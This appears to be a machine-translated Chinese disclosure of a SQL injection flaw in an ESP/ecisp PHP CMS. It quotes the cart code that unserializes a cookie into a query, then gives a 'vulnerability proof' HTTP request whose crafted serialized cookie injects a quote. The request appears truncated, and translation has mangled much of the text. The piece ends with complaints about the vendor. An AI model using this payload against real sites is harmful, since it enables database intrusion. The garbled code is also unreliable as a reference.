$ Membercookieview = $ this-> member_cookieview ();
If (! Empty ($ membercookieview ['userid']) &! Empty ($ membercookieview ['username']) {
$ RsMember = $ this-> get_member (null, $ membercookieview ['userid']);
}
$ This-> pagetemplate-> assign ('member', $ rsMember );
}
$ Cartid = $ this-> fun-> accept ('ecisp _ enquiry_list ', 'C ');
$ Cartid = stripslashes (htmlspecialchars_decode ($ cartid ));
$ Uncartid =! Empty ($ cartid )? Unserialize ($ cartid): 0;
If ($ uncartid & is_array ($ uncartid )){
$ Didarray = $ this-> fun-> key_array_name ($ uncartid, 'did', 'amount ');
$ Didlist = $ this-> fun-> format_array_text (array_keys ($ didarray ),',');
If (! Empty ($ didlist )){
$ Db_table = db_prefix. 'document ';
$ Db_where = "isclass = 1 AND did in ($ didlist) order by did DESC ";
Echo $ SQL = "SELECT * FROM $ db_table WHERE $ db_where ";
$ Rs = $ this-> db-> query ($ SQL );
$ Productmoney = 0;
While ($ rsList = $ this-> db-> fetch_assoc ($ rs )){
$ RsList ['link'] = $ this-> get_link ('Doc', $ rsList, admin_LNG );
$ RsList ['bucket'] = $ this-> get_link ('bucket', $ rsList, admin_LNG );
$ RsList ['enqlink'] = $ this-> get_link ('enqlink', $ rsList, admin_LNG );
$ RsList ['dellink'] = $ this-> get_link ('enabled', $ rsList, admin_LNG );
$ RsList ['title'] = empty ($ rsList ['color'])? $ RsList ['title']: "<font color = '". $ rsList ['color']. "'> ". $ rsList ['title']. "</font> ";
$ RsList ['amount'] = $ didarray [$ rsList ['did'];
$ Array [] = $ rsList;
Vulnerability proof: Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv: 13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.bkjia.com/ESP/index. php? Ac = enquiry & at = into & did = 27
Cookie: ecisp_home_seccode = XXWCeH9lPaRlZmVZcamUmYs; ecisp_member_username = o6DFzQ; ecisp_member_info = arPekrVo4p6hxZ91qqKQx6fRr5SWl2WZkWhslJfgZWloZ5mSb2uZY7SbZmeaZZKUaMlqw53JZ5SRl5zFyJVmnm5pmJJumZ-Smt6YZ22Sl5ttnJfEnJ1nkppinMfKm2hva5mVx3GZyJGdlw; ecisp_enquiry_list = a % 3A1% 3A % 7Bs % 3A3% 3A % 22k27% 22% 3Ba % 3A2% 3A % 7Bs % 3A3% 3A % 22did % 22% 3Bs % 3A8% 3A % 22% 27
The official team is too bad !! Add Q three times. Do not pass.
I added Q to ask him questions and ignore him !! Angry
Solution: You know!